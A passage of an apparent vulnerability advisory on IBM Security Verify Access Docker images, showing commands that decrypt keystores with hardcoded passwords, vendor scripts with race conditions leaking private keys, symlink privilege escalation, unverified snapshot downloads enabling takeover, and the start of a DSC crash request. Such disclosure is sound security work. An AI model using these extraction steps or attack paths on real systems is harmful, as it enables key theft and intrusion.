ibmcom/_verify-access.tar/698cf9c0c7bb644159c92ba42d86417dd09694093db2eaf8875885e5ddd62fcc/var/isam/cluster/sundry/odbc/ewallet.p12 -out /tmp/ewallet.test \n Enter Import Password: [passw0rd]\n kali-docker# cat /tmp/ewallet.test\n Bag Attributes\n localKeyID: E6 B6 52 DD 00 00 00 04 00 00 00 00 00 00 00 03 00 00 00 00 00 00 00 04 \n subject=C = us, O = ibm, CN = rhel66.home.com\n issuer=C = us, O = ibm, CN = rhel66.home.com\n -----BEGIN CERTIFICATE-----\n MIIB2TCCAUICAQAwDQYJKoZIhvcNAQEEBQAwNTELMAkGA1UEBhMCdXMxDDAKBgNV\n BAoTA2libTEYMBYGA1UEAxMPcmhlbDY2LmhvbWUuY29tMB4XDTE2MDYwNDE4MjAx\n N1oXDTI2MDYwMjE4MjAxN1owNTELMAkGA1UEBhMCdXMxDDAKBgNVBAoTA2libTEY\n MBYGA1UEAxMPcmhlbDY2LmhvbWUuY29tMIGfMA0GCSqGSIb3DQEBAQUAA4GNADCB\n iQKBgQC5awQOrQ/BlLYQ1dC0+e2NplzULT447UNrj8yaPqH0FeoqgLH29FzpVJV1\n IWzN06IGSUEeyAck7u7EUg1BK3eyfwO3o1qolrvRkm4Rsvg+yijUIr2aSV0Xz9oR\n 71C+YMHr1MtGi6Xn432+vPSc2AxQVBKCVj0rBGka6V9mwWDPewIDAQABMA0GCSqG\n SIb3DQEBBAUAA4GBAF9QlpGUC9QcxgI0B77xY0/2bNd3xBfS+hTbgyyoWRzH43so\n 1VG97F6g0rR6wvsAOTdr7kJn+t7sMyuhdJ2/TmZFATUL+6j9XpJH+7r+Ca4iIMB+\n ysi09PVz6ccrsgpD9SiYxQ4HMJ+YKBahPg3geEUIkratxB69qZy0uP5WSp64\n -----END CERTIFICATE-----\n kali-docker# openssl x509 -in /tmp/ewallet.test -text -noout \n Certificate:\n Data:\n Version: 1 (0x0)\n Serial Number: 0 (0x0)\n Signature Algorithm: md5WithRSAEncryption\n Issuer: C = us, O = ibm, CN = rhel66.home.com\n Validity\n Not Before: Jun 4 18:20:17 2016 GMT\n Not After : Jun 2 18:20:17 2026 GMT\n Subject: C = us, O = ibm, CN = rhel66.home.com\n Subject Public Key Info:\n Public Key Algorithm: rsaEncryption\n Public-Key: (1024 bit)\n Modulus:\n 00:b9:6b:04:0e:ad:0f:c1:94:b6:10:d5:d0:b4:f9:\n ed:8d:a6:5c:d4:2d:3e:38:ed:43:6b:8f:cc:9a:3e:\n a1:f4:15:ea:2a:80:b1:f6:f4:5c:e9:54:95:75:21:\n 6c:cd:d3:a2:06:49:41:1e:c8:07:24:ee:ee:c4:52:\n 0d:41:2b:77:b2:7f:03:b7:a3:5a:a8:96:bb:d1:92:\n 6e:11:b2:f8:3e:ca:28:d4:22:bd:9a:49:5d:17:cf:\n da:11:ef:50:be:60:c1:eb:d4:cb:46:8b:a5:e7:e3:\n 7d:be:bc:f4:9c:d8:0c:50:54:12:82:56:3d:2b:04:\n 69:1a:e9:5f:66:c1:60:cf:7b\n Exponent: 65537 (0x10001)\n Signature Algorithm: md5WithRSAEncryption\n Signature Value:\n 5f:50:96:91:94:0b:d4:1c:c6:02:34:07:be:f1:63:4f:f6:6c:\n d7:77:c4:17:d2:fa:14:db:83:2c:a8:59:1c:c7:e3:7b:28:d5:\n 51:bd:ec:5e:a0:d2:b4:7a:c2:fb:00:39:37:6b:ee:42:67:fa:\n de:ec:33:2b:a1:74:9d:bf:4e:66:45:01:35:0b:fb:a8:fd:5e:\n 92:47:fb:ba:fe:09:ae:22:20:c0:7e:ca:c8:b4:f4:f5:73:e9:\n c7:2b:b2:0a:43:f5:28:98:c5:0e:07:30:9f:98:28:16:a1:3e:\n 0d:e0:78:45:08:92:b6:ad:c4:1e:bd:a9:9c:b4:b8:fe:56:4a:\n 9e:b8\n\nThe other files have been decrypted using `IBM Crypto For C` and OpenSSL. \n\nThe `lmi_trust_store.p12` file in the verify-access image contains several CAs and will also include the hardcoded key for the `Isam CA` in a live instance (after configuration):\n\n kali-docker# file=ibmcom/_verify-access.tar/698cf9c0c7bb644159c92ba42d86417dd09694093db2eaf8875885e5ddd62fcc/var/pdweb/shared/keytab/lmi_trust_store.p12\n kali-docker# LD_LIBRARY_PATH=/home/user/ibmcom/_verify-access-dsc.tar/2367f4ea9084713497b97a1fdbd68e6b3845d86537a89f1d6217eb545e8a0865/usr/local/ibm/gsk8_64/lib64/ /home/user/ibmcom/_verify-access-dsc.tar/2367f4ea9084713497b97a1fdbd68e6b3845d86537a89f1d6217eb545e8a0865/usr/local/ibm/gsk8_64/bin/gsk8capicmd_64 -cert -export -db $file -stashed -target /tmp/tmp.p12 -target_pw passwordpassword\n \n kali-docker# openssl pkcs12 -in /tmp/tmp.p12 -info -passin pass:passwordpassword\n MAC: sha1, Iteration 1024\n MAC length: 20, salt length: 8\n PKCS7 Encrypted data: pbeWithSHA1And3-KeyTripleDES-CBC, Iteration 1024\n Certificate bag\n Bag Attributes\n friendlyName: CN=DigiCert Global Root CA,OU=www.digicert.com,O=DigiCert Inc,C=US\n localKeyID: 03 82 01 01 00 CB 9C 37 AA 48 13 12 0A FA DD 44 9C 4F 52 B0 F4 DF AE 04 F5 79 79 08 A3 24 18 FC 4B 2B 84 C0 2D B9 D5 C7 FE F4 C1 1F 58 CB B8 6D 9C 7A 74 E7 98 29 AB 11 B5 E3 70 A0 A1 CD 4C 88 99 93 8C 91 70 E2 AB 0F 1C BE 93 A9 FF 63 D5 E4 07 60 D3 A3 BF 9D 5B 09 F1 D5 8E E3 53 F4 8E 63 FA 3F A7 DB B4 66 DF 62 66 D6 D1 6E 41 8D F2 2D B5 EA 77 4A 9F 9D 58 E2 2B 59 C0 40 23 ED 2D 28 82 45 3E 79 54 92 26 98 E0 80 48 A8 37 EF F0 D6 79 60 16 DE AC E8 0E CD 6E AC 44 17 38 2F 49 DA E1 45 3E 2A B9 36 53 CF 3A 50 06 F7 2E E8 C4 57 49 6C 61 21 18 D5 04 AD 78 3C 2C 3A 80 6B A7 EB AF 15 14 E9 D8 89 C1 B9 38 6C E2 91 6C 8A FF 64 B9 77 25 57 30 C0 1B 24 A3 E1 DC E9 DF 47 7C B5 B4 24 08 05 30 EC 2D BD 0B BF 45 BF 50 B9 A9 F3 EB 98 01 12 AD C8 88 C6 98 34 5F 8D 0A 3C C6 E9 D5 95 95 6D DE \n 2.16.840.1.113894.746875.1.1: \u003cUnsupported tag 6\u003e\n subject=C = US, O = DigiCert Inc, OU = www.digicert.com, CN = DigiCert Global Root CA\n issuer=C = US, O = DigiCert Inc, OU = www.digicert.com, CN = DigiCert Global Root CA\n -----BEGIN CERTIFICATE-----\n MIIDrzCCApegAwIBAgIQCDvgVpBCRrGhdWrJWZHHSjANBgkqhkiG9w0BAQUFADBh\n MQswCQYDVQQGEwJVUzEVMBMGA1UEChMMRGlnaUNlcnQgSW5jMRkwFwYDVQQLExB3\n d3cuZGlnaWNlcnQuY29tMSAwHgYDVQQDExdEaWdpQ2VydCBHbG9iYWwgUm9vdCBD\n QTAeFw0wNjExMTAwMDAwMDBaFw0zMTExMTAwMDAwMDBaMGExCzAJBgNVBAYTAlVT\n MRUwEwYDVQQKEwxEaWdpQ2VydCBJbmMxGTAXBgNVBAsTEHd3dy5kaWdpY2VydC5j\n b20xIDAeBgNVBAMTF0RpZ2lDZXJ0IEdsb2JhbCBSb290IENBMIIBIjANBgkqhkiG\n 9w0BAQEFAAOCAQ8AMIIBCgKCAQEA4jvhEXLeqKTTo1eqUKKPC3eQyaKl7hLOllsB\n CSDMAZOnTjC3U/dDxGkAV53ijSLdhwZAAIEJzs4bg7/fzTtxRuLWZscFs3YnFo97\n nh6Vfe63SKMI2tavegw5BmV/Sl0fvBf4q77uKNd0f3p4mVmFaG5cIzJLv07A6Fpt\n 43C/dxC//AH2hdmoRBBYMql1GNXRor5H4idq9Joz+EkIYIvUX7Q6hL+hqkpMfT7P\n T19sdl6gSzeRntwi5m3OFBqOasv+zbMUZBfHWymeMr/y7vrTC0LUq7dBMtoM1O/4\n gdW7jVg/tRvoSSiicNoxBN33shbyTApOB6jtSj1etX+jkMOvJwIDAQABo2MwYTAO\n BgNVHQ8BAf8EBAMCAYYwDwYDVR0TAQH/BAUwAwEB/zAdBgNVHQ4EFgQUA95QNVbR\n TLtm8KPiGxvDl7I90VUwHwYDVR0jBBgwFoAUA95QNVbRTLtm8KPiGxvDl7I90VUw\n DQYJKoZIhvcNAQEFBQADggEBAMucN6pIExIK+t1EnE9SsPTfrgT1eXkIoyQY/Esr\n hMAtudXH/vTBH1jLuG2cenTnmCmrEbXjcKChzUyImZOMkXDiqw8cvpOp/2PV5Adg\n 06O/nVsJ8dWO41P0jmP6P6fbtGbfYmbW0W5BjfIttep3Sp+dWOIrWcBAI+0tKIJF\n PnlUkiaY4IBIqDfv8NZ5YBberOgOzW6sRBc4L0na4UU+Krk2U886UAb3LujEV0ls\n YSEY1QSteDwsOoBrp+uvFRTp2InBuThs4pFsiv9kuXclVzDAGySj4dzp30d8tbQk\n CAUw7C29C79Fv1C5qfPrmAESrciIxpg0X40KPMbp1ZWVbd4=\n -----END CERTIFICATE-----\n Certificate bag\n Bag Attributes\n friendlyName: CN=DigiCert ECC Secure Server CA,O=DigiCert Inc,C=US\n [...]\n\nWhen auditing live installations, the decrypted `lmi_trust_store.p12` file will contain the private key of the isam CA. \n\n kali% openssl x509 -in crt.pem -text -noout -modulus\n Certificate:\n Data:\n Version: 3 (0x2)\n Serial Number: 14004578023842938\n Signature Algorithm: sha256WithRSAEncryption\n Issuer: C = us, O = ibm, CN = isam\n Validity\n Not Before: Sep 19 07:01:51 2022 GMT\n Not After : Sep 17 07:01:51 2032 GMT\n Subject: C = us, O = ibm, CN = isam\n [...]\n Modulus=C8B3[REDACTED]\n \n kali% openssl rsa -in crt.key -modulus \n Enter pass phrase for crt.key:\n Modulus=C8B3[REDACTED]\n writing RSA key\n -----BEGIN PRIVATE KEY-----\n [REDACTED]\n -----END PRIVATE KEY-----\n\nIt is also possible to decrypt the `embedded_ldap_keys.p12` file:\n\n kali-docker# openssl pkcs12 -in embedded_ldap_keys.p12 -info -passin pass:passwordpassword \n MAC: sha1, Iteration 1024 \n MAC length: 20, salt length: 8\n PKCS7 Data\n Shrouded Keybag: pbeWithSHA1And3-KeyTripleDES-CBC, Iteration 5\n Bag Attributes\n friendlyName: server\n localKeyID: [REDACTED]\n Key Attributes: \u003cNo Attributes\u003e\n Enter PEM pass phrase: [password]\n Verifying - Enter PEM pass phrase: [password]\n -----BEGIN ENCRYPTED PRIVATE KEY-----\n [REDACTED]\n -----END ENCRYPTED PRIVATE KEY-----\n PKCS7 Encrypted data: pbeWithSHA1And3-KeyTripleDES-CBC, Iteration 1024\n Certificate bag\n Bag Attributes\n friendlyName: server\n localKeyID: [REDACTED]\n subject=C = us, O = ibm, CN = isam\n issuer=C = us, O = ibm, CN = isam\n -----BEGIN CERTIFICATE-----\n [REDACTED]\n -----END CERTIFICATE-----\n kali-docker#\n\nUsing a dynamic analysis, it was confirmed that several private keys are included in the snapshot images and used at least by OpenLDAP. The .p12 files can be decrypted using `IBM Crypto For C` and OpenSSL. \n\n kali-docker# pwd \n /home/user/snapshots/_a22547c15c88-verify-access-runtime_10.0.4.0.tar-default.snapshot/var/pdweb/shared/keytab\n kali-docker# ls -la\n total 492\n drwxr-x--- 2 root root 4096 Oct 18 05:13 . \n drwxr-x--- 16 root root 4096 Sep 20 03:01 .. \n -rw-r----- 1 root root 2952 Sep 20 03:01 embedded_ldap_keys.p12\n -rw-r----- 1 root root 193 Jun 8 01:31 embedded_ldap_keys.sth\n -rw-r----- 1 root root 47630 Sep 20 03:09 lmi_trust_store.p12\n -rw-r----- 1 root root 193 Jun 8 01:31 lmi_trust_store.sth\n -rw-r----- 1 root root 109313 Sep 20 03:17 rt_profile_keys.p12\n -rw-r----- 1 root root 193 Jun 8 01:31 rt_profile_keys.sth\n [...]\n\n\n\n## Details - Incorrect permissions in verify-access-dsc (race condition and leak of private key)\n\nIt was observed that the Docker image verify-access-dsc uses insecure temporary files to store sensitive information. \n\nThe `/usr/sbin/bootstrap.sh` script will generate temporary files using the default umask (`022`). \n\nIn the `build_health_check_config()` function found inside the `/usr/sbin/bootstrap.sh` script (executed when the instance starts), we can see that several files are generated:\n\n- - /tmp/health_check.p12\n- - /var/dsc/.health/port.txt\n\nContent of `/usr/sbin/bootstrap.sh`:\n\n[code:shell]\n 65 #############################################################################\n 66 # Construct the health check configuration information. This will include\n 67 # the port and client certificate information. \n 68 \n 69 build_health_check_config()\n 70 {\n 71 if [ -z \"$INSTANCE\" ] ; then\n 72 INSTANCE=1\n 73 fi\n 74 \n 75 conf=/var/dsc/etc/dsc.conf.${INSTANCE}\n 76 \n 77 if [ ! -f ${conf} ] ; then\n 78 Echo 973 \"${INSTANCE}\"\n 79 exit 1\n 80 fi\n 81 \n 82 #\n 83 # Determine the port which is to be used. \n 84 #\n 85 \n 86 port=`/opt/PolicyDirector/sbin/pdconf -f $conf getentry \\\n 87 dsess-server ssl-listen-port`\n 88 \n 89 mkdir -p /var/dsc/.health\n 90 \n 91 echo $port \u003e /var/dsc/.health/port.txt\n 92 \n 93 #\n 94 # Extract the client certificate which is used to communicate with the\n 95 # server. \n 96 #\n 97 \n 98 cert_file=/var/dsc/.health/health_check.pem\n 99 \n100 tmp_p12=/tmp/health_check.p12\n101 tmp_pwd=health_check\n102 \n103 # Work out the name of the key file which is being used. \n104 key_file=`/opt/PolicyDirector/sbin/pdconf -f $conf getentry \\\n105 dsess-server ssl-keyfile`\n106 \n107 # Export the key into a key database type which is supported\n108 # by OpenSSL. \n109 gsk8capicmd_64 -cert -export -db $key_file -stashed \\\n110 -target $tmp_p12 -target_pw $tmp_pwd\n111 \n112 # Convert the key into something that curl understands. \n113 openssl pkcs12 -in $tmp_p12 -out $cert_file -nodes \\\n114 -passin pass:$tmp_pwd 2\u003e/dev/null\n115 \n116 # Tidy up. \n117 rm -f $tmp_p12\n118 }\n119\n[...]\n176 #\n177 # Extract the health check information. \n178 #\n179 \n180 build_health_check_config\n[/code]\n\nThe temporary file `/tmp/health_check.p12` contains the private keys of the dsc server and the dsc client. This key file is stored using the `644` permissions allowing any local attacker to extract these keys when the Docker image starts. \n\nFurthermore, the password of the certificate file is hardcoded (to `health_check`, on line 101). \n\nWhen checking the files generated by this script, we can confirm the files are world-readable. For example, for the `/var/dsc/.health/port.txt` file, the permissions are 644:\n\n [isam@verify-access-dsc /]$ ls -la /var/dsc/.health/\n total 28\n drwxr-xr-x 2 isam isam 4096 Oct 4 09:07 . \n drwxrwx--- 1 isam root 4096 Oct 4 09:07 .. \n -rw------- 1 isam isam 9268 Oct 4 09:07 health_check.pem\n -rw-r--r-- 1 isam isam 5 Oct 4 09:07 port.txt\n [isam@verify-access-dsc /]$\n\n\nThere is a race condition in the `/usr/sbin/bootstrap.sh` script allowing a local attacker with access to the verify-access-dsc instance to extract the private keys of the dsc server and the dsc client when the Docker image starts. \n\nThe filename is predictable, allowing a local attacker to create the destination file before the script is executed. The content of the destination file will be overwritten by the `/usr/sbin/health_check.sh` script but the ownership of the file will still belong to an attacker, allowing extracting the private keys. \n\nThe password is hardcoded. \n\nInsecure permissions are used for sensitive files. \n\n\n\n## Details - Insecure health_check.sh script in verify-access (race condition and leak of private key)\n\nIt was observed that the Docker image verify-access runs regularly the script `/usr/sbin/health_check.sh`. \n\nThis script uses a temporary file to store sensitive information. Since this script uses the default umask (`022`), an attacker can exploit a race condition (between the lines 91 and 95) to extract the private keys of the dsc server and the dsc clients. \n\nThe `/tmp/health_check.pem` output file will also be created containing the private keys in clear-text (in line 91), allowing an attacker to extract these private keys:\n\nContent of `/usr/sbin/health_check.sh`:\n\n[code:shell]\n[...]\n65 cert_file=/tmp/health_check.pem\n66 \n67 trap \"rm -f $result_file $error_file $hdr_file\" EXIT\n68 \n69 # The following function will extract a key which can be used to authenticate\n70 # to the DSC. \n71 \n72 extract_dsc_key()\n73 {\n74 if [ ! -f $cert_file ] ; then\n75 tmp_p12=/tmp/health_check.p12.$$\n76 tmp_pwd=health_check\n77 \n78 # Work out the name of the DSC configuration file. \n79 conf_file=`mesa_config wga.ftype dir dsc.conf -production`\n80 \n81 # Work out the name of the key file which is being used. \n82 key_file=`/opt/PolicyDirector/sbin/pdconf -f $conf_file getentry \\\n83 dsess-server ssl-keyfile`\n84 \n85 # Export the key into a key database type which is supported\n86 # by OpenSSL. \n87 gsk8capicmd_64 -cert -export -db $key_file -stashed \\\n88 -target $tmp_p12 -target_pw $tmp_pwd\n89 \n90 # Convert the key into something that curl understands. \n91 openssl pkcs12 -in $tmp_p12 -out $cert_file -nodes \\\n92 -passin pass:$tmp_pwd 2\u003e/dev/null\n93 \n94 # Tidy up. \n95 rm -f $tmp_p12\n96 fi\n97 }\n[...]\n[/code]\n\nThe file `/tmp/health_check.p12.$$` (`$$` corresponding to the local PID) will be generated with the password `health_check` and will contain the private keys of the dsc client and the dsc server. This file will be world-readable. Then the file will be erased. \n\nThere is a race condition in the `/usr/sbin/health_check.sh` script allowing a local attacker with access to the verify-access instance to extract the private keys of the dsc server and the dsc client. \n\nThe filename is predictable, allowing a local attacker to create potential destination files before the execution of the script. The content of the destination file will be overwritten by the `/usr/sbin/health_check.sh` script but the ownership of the file will still belong to an attacker, allowing extracting the private keys. \n\nThere is also a leak of private keys in the world-readable file `/tmp/health_check.pem`. \n\nThe password is hardcoded. \n\nInsecure permissions are used for sensitive files. \n\n\n\n## Details - Local Privilege Escalation due to insecure health_check.sh script in verify-access (insecure SSL, insecure files)\n\nIt was observed that the Docker image verify-access regularly runs the script `/usr/sbin/health_check.sh`. \n\nThis script uses curl, without checking the remote SSL certificate:\n\nContent of `/usr/sbin/health_check.sh`:\n\n[code:shell]\n190 #\n191 # Make the curl request. \n192 #\n193 \n194 eval curl --insecure --output $result_file --silent --show-error \\\n195 -D $hdr_file $extra_args https://127.0.0.1:$port 2\u003e $error_file\n196\n[/code]\n\nThe eval instruction does not seem exploitable. \n\nThis script uses 2 temporary files to store the standard output (stdout) and the error output (stderr) of the curl command: an attacker can exploit these 2 temporary files to overwrite any file in the filesystem using pre-generated symbolic links inside `/tmp`:\n\nContent of `/usr/sbin/health_check.sh`:\n\n[code:shell]\n 62 result_file=/tmp/health_check.out.$$\n 63 error_file=/tmp/health_check.err.$$\n[...]\n194 eval curl --insecure --output $result_file --silent --show-error \\\n195 -D $hdr_file $extra_args https://127.0.0.1:$port 2\u003e $error_file\n[/code]\n\n\nThe `/tmp/health_check.out.$$` file (`$$` corresponding to the local PID) can be a symbolic link generated by a local attacker - the content of the linked file will be overwritten as root. \n\nThe `/tmp/health_check.err.$$` file (`$$` corresponding to the local PID) can be a symbolic link generated by a local attacker - the content of the linked file will be overwritten as root. \n\nThe script trusts any insecure HTTPS server, due to the use of the `--insecure` flag in curl. \n\nThere are two uses of insecure files in the `/usr/sbin/health_check.sh` script allowing a local attacker with access to the verify-access instance to overwrite any file as root - it is possible to get a Local Privilege Escalation as root. \n\nThe filenames are predictable, allowing a local attacker to create potential destination files before the execution of the script. The content of the destination files will be overwritten by the `/usr/sbin/health_check.sh` script. \n\n\n\n## Details - Local Privilege Escalation due to insecure health_check.sh script in verify-access-dsc (insecure SSL, insecure file)\n\nIt was observed that the Docker image verify-access-sc runs regularly the script `/usr/sbin/health_check.sh`. \n\nThis script uses a temporary file to store errors: an attacker can exploit a race condition to overwrite any file in the filesystem using a pre-generated symbolic link. \n\nFurthermore, the script uses insecure options for curl on line 73 (`--insecure`) - the SSL certificate of the remote host will not be validated:\n\nContent of `/usr/sbin/health_check.sh`:\n\n[code:shell]\n62 #\n63 # Test access to the server as this will govern whether we are healthy or\n64 # not. \n65 #\n66 \n67 error_file=/tmp/health_check.err.$$\n68 \n69 trap \"rm -f $error_file\" EXIT\n70 \n71 ping_body=\u0027\u003c?xml version=\"1.0\" encoding=\"utf-8\" ?\u003e\u003cSOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:xsi=\"http://www.w3.org/2001/X MLSchema-instance\"\u003e\u003cSOAP-ENV:Body\u003e\u003cns1:ping xmlns:ns1=\"http://sms.am.tivoli.com\"\u003e\u003cns1:something\u003e0\u003c/ns1:something\u003e\u003c/ns1:ping\u003e\u003c/SOAP-ENV:Body\u003e\u003c/SOAP-ENV:Envelope\u003e\u0027\n72 \n73 curl -s -o /dev/null --show-error --insecure --cert $cert_file -X POST \\\n74 -H \u0027SOAPAction: \"ping\"\u0027 \\\n75 --data \"$ping_body\" \\\n76 https://127.0.0.1:$port 2\u003e $error_file\n77 \n78 if [ $? -ne 0 ] ; then\n79 #\n80 # We don\u0027t know for sure yet whether the DSC is alive or not because it\n81 # could be passive (only a single DSC is active in an environment at any\n82 # one time). So, we also need to try a simple SSL connection before we\n83 # return that the server is actually unhealthy. We could have simply\n84 # avoided the initial curl call, but by only performing the SSL connection\n85 # test when the DSC is passive we avoid SSL error messages being displayed\n86 # on the console. \n87 #\n88 \n89 openssl s_client -connect 127.0.0.1:$port 2\u003e\u00261 | grep -q CONNECTED\n90 \n91 if [ $? -eq 0 ] ; then\n92 exit 0\n93 fi\n94 \n95 echo \"Error\u003e failed to connect to the service.\"\n96 \n97 cat $error_file; rm -f $cert_file\n[/code]\n\nThe `/tmp/health_check.err.$$` file (`$$` corresponding to the local PID) can be a symbolic link that will be followed in the line 76. This allows an attacker to overwrite any file on the system because curl is executed as root. \n\nThere is a race condition in the `/usr/sbin/health_check.sh` script allowing a local attacker to overwrite any file as root on the instance - it is possible to get a Local Privilege Escalation as root. \n\nThe filename is predictable, allowing a local attacker to create potential destination files. The content of the destination file will be overwritten by the stderr file descriptor of the curl command. \n\n\n\n## Details - Remote Code Execution due to insecure download of snapshot in verify-access-dsc, verify-access-runtime and verify-access-wrp\n\nIt was observed that the Docker images verify-access-dsc ,verify-access-runtime and verify-access-wrp are able to download the snapshot file over HTTPS without checking the SSL certificate of the remote server, allowing an attacker to MITM the connection and retrieve the snapshot file or to provide a malicious snapshot file to the system. \n\nThe `/usr/sbin/.bootstrap_common.sh` script is executed from the `/usr/sbin/bootstrap.sh` script when the instance starts:\n\nContent of `/usr/sbin/bootstrap.sh` in verify-access-dsc\n\n[code:shell]\n139 #\n140 # Wait for the snapshot file. \n141 #\n142 \n143 wait_for_snapshot\n[/code]\n\nIn verify-access-runtime, the function `wait_for_snapshot()` is called on line 93 inside the `/usr/sbin/bootstrap.sh` script. \n\nThe function `wait_for_snapshot()` calls the function `download_from_cfgsvc()` (line 251):\n\nContent of `/usr/sbin/.bootstrap_common.sh` in verify-access-dsc, verify-access-runtime and verify-access-wrp:\n\n[code:shell]\n240 #############################################################################\n241 # Wait for the snapshot file. \n242 \n243 wait_for_snapshot()\n244 {\n245 download_from_cfgsvc 1\n246 \n247 if [ ! -f $snapshot ] ; then\n248 Echo 969\n249 \n250 while [ ! -f $snapshot ] ; do\n251 download_from_cfgsvc 0\n252 \n253 if [ ! -f $snapshot ] ; then\n254 sleep 1\n255 fi\n256 done\n257 \n258 Echo 970\n259 fi\n260 }\n[/code]\n\nAnd the function `download_from_cfgsvc()` uses curl to download a snapshot, without checking the SSL certificate of the remote server. The `-k` option (also known as `--insecure`) disables any SSL verification (line 154):\n\nContent `/usr/sbin/.bootstrap_common.sh` in verify-access-dsc, verify-access-runtime and verify-access-wrp:\n\n[code:shell]\n140 download_from_cfgsvc()\n141 {\n142 # No need to download the snapshot if the configuration service has not\n143 # been defined. \n144 if [ -z \"$CONFIG_SERVICE_URL\" ] ; then\n145 return\n146 fi\n147 \n148 if [ $1 -eq 1 ] ; then\n149 Echo 960\n150 fi\n151 \n152 snapshotUri=\"`basename $snapshot`?type=File\u0026client=`cat /etc/hostname`\"\n153 \n154 curl -k -s --fail -u \"$CONFIG_SERVICE_USER_NAME:$CONFIG_SERVICE_USER_PWD\" \\\n155 \"$CONFIG_SERVICE_URL/snapshots/$snapshotUri\" \\\n156 -o $snapshot\n157 \n158 if [ $? -ne 0 ] ; then\n159 if [ $1 -eq 1 ] ; then\n160 Echo 961\n161 fi\n162 \n163 rm -f $snapshot\n164 else\n165 Echo 962\n166 fi\n167 }\n[/code]\n\n- From the curl(1) man page:\n\n -k, --insecure\n (TLS) By default, every SSL connection curl makes is verified to\n be secure. This option allows curl to proceed and operate even\n for server connections otherwise considered insecure. \n \n The server connection is verified by making sure the server\u0027s\n certificate contains the right name and verifies successfully\n using the cert store. \n \n See this online resource for further details:\n https://curl.haxx.se/docs/sslcerts.html\n \n See also --proxy-insecure and --cacert. \n\nThe same issue exists with the function `download_fixpacks()` in the same shell script (line 201):\n\nContent of `/usr/sbin/.bootstrap_common.sh` in verify-access-dsc, verify-access-runtime and verify-access-wrp:\n\n[code:shell]\n169 #############################################################################\n170 # Attempt to download any requested fixpacks from the configuration service. \n171 \n172 download_fixpacks()\n173 {\n174 # No need to download the fixpacks if the configuration service has not\n175 # been defined. \n176 if [ -z \"$CONFIG_SERVICE_URL\" ] ; then\n177 return\n178 fi\n179 \n180 # No need to download the fixpacks if no fixpack has been specified, or\n181 # if the fixpack has been set to \u0027disabled\u0027. \n182 if [ -z \"${FIXPACKS}\" -o \"${FIXPACKS}\" = \"disabled\" ]; then\n183 return\n184 fi\n185 \n186 # Set the fixpack directory, and then ensure that the fixpack directory\n187 # has been created. \n188 fixpack_dir=/tmp/fixpacks\n189 \n190 if [ -d $fixpack_dir ] ; then\n191 rm -rf $fixpack_dir/*\n192 else\n193 mkdir -p $fixpack_dir\n194 fi\n195 \n196 # If we get this far we know that one or more fixpacks have been specified. \n197 # We need to download each of these now. \n198 for fixpack in $FIXPACKS; do\n199 fixpackUri=\"$fixpack?type=File\u0026client=`cat /etc/hostname`\"\n200 \n201 curl -k -s --fail \\\n202 -u \"$CONFIG_SERVICE_USER_NAME:$CONFIG_SERVICE_USER_PWD\" \\\n203 \"$CONFIG_SERVICE_URL/fixpacks/$fixpackUri\" \\\n204 -o $fixpack_dir/$fixpack\n[/code]\n\nThe fixpacks will be then installed as root inside the image:\n\nContent of `/usr/sbin/.bootstrap_common.sh` in verify-access-dsc, verify-access-runtime and verify-access-wrp:\n\n[code:shell]\n231 for fixpack in $FIXPACKS; do\n232 Echo 967 \"${fixpack}\"\n233 /usr/sbin/isva_install_fixpack -i ${fixpack_dir}/${fixpack} \u003e/dev/null\n234 if [ $? -ne 0 ]; then\n235 Echo 968 \"${fixpack}\"\n236 fi\n[/code]\n\nAn attacker located on the network can inject a malicious snapshot file into the platform or MITM the connection to a server containing the snapshot image and take control over the entire platform. \n\n\n\n## Details - Lack of authentication in Postgres inside verify-access-runtime\n\nIt was observed that the Docker image verify-access-runtime configures Postgres without authentication. \n\nThe `/usr/sbin/bootstrap.sh` script configures and starts the postgres daemon. We can see the lack of authentication:\n\n[code:shell]\n135 #\n136 # Start the postgresql server. \n137 #\n138 \n139 Echo 974\n140 \n141 db_root=/var/postgresql/config\n142 db_data_root=$db_root/data\n143 db_snapshot=$db_root/snapshot.sql\n144 db_log_dir=/var/application.logs/db/config\n145 db_port=5432\n146 db_name=config\n147 db_user=www-data\n148 \n149 if [ ! -f $db_snapshot ] ; then\n150 Echo 975\n151 exit 1\n152 fi\n153 \n154 mkdir -p $db_log_dir\n155 \n156 rm -rf $db_data_root\n157 \n158 initdb -D $db_data_root --locale=C -U $db_user -A trust \u003e /dev/null\n159 \n160 pg_ctl -s -D $db_data_root -l $db_log_dir/logfile start\n161 \n162 createdb -U $db_user -p $db_port -w $db_name \u003e /dev/null\n163 \n164 psql -U $db_user -p $db_port -f $db_snapshot -w -q $db_name \u003e /dev/null\n165\n[/code]\n\nA local attacker can compromise the postgres database. \n\n\n\n## Details - Null pointer dereference in dscd - Remote DoS against DSC instances\n\nIt was observed that the DSC (Distributed Session Cache) servers can be remotely crashed, resulting in a DoS of the authentication infrastructure. \n\nThe DSC servers are reachable using the `/DSess/services/DSess` API running on port 8443/tcp. \n\nUsing an SSL client certificate, it is possible to reach the remote DSC instances from the same network segment:\n\n [user@container-01 ~]$ curl -kv https://dsc-02.test.lan:8443\n * Rebuilt URL to: https://dsc-02.test.lan:8443/\n * Trying 10.0.0.16... \n * TCP_NODELAY set\n * Connected to dsc-02.test.lan (10.0.0.16) port 8443 (#0)\n * ALPN, offering h2\n * ALPN, offering http/1.1\n * successfully set certificate verify locations:\n * CAfile: /etc/pki/tls/certs/ca-bundle.crt\n CApath: none\n * TLSv1.3 (OUT), TLS handshake, Client hello (1):\n * TLSv1.3 (IN), TLS handshake, Server hello (2):\n * TLSv1.2 (IN), TLS handshake, Certificate (11):\n * TLSv1.2 (IN), TLS handshake, Request CERT (13):\n * TLSv1.2 (IN), TLS handshake, Server finished (14):\n * TLSv1.2 (OUT), TLS handshake, Certificate (11):\n * TLSv1.2 (OUT), TLS handshake, Client key exchange (16):\n * TLSv1.2 (OUT), TLS change cipher, Change cipher spec (1):\n * TLSv1.2 (OUT), TLS handshake, Finished (20):\n * TLSv1.2 (IN), TLS alert, handshake failure (552):\n * error:14094410:SSL routines:ssl3_read_bytes:sslv3 alert handshake failure\n * Closing connection 0\n curl: (35) error:14094410:SSL routines:ssl3_read_bytes:sslv3 alert handshake failure\n\nWith a client certificate, we can reach the `/DSess/services/DSess` API:\n\nSending a normal request (ping):\n\n kali% curl --key dsc-client.key --cert dsc-client.pem --show-error --insecure https://dsc.test.lan:8443/DSess/services/DSess -X POST -H \u0027SOAPAction: \"ping\"\u0027 --data \u0027\u003c?xml version=\"1.0\" 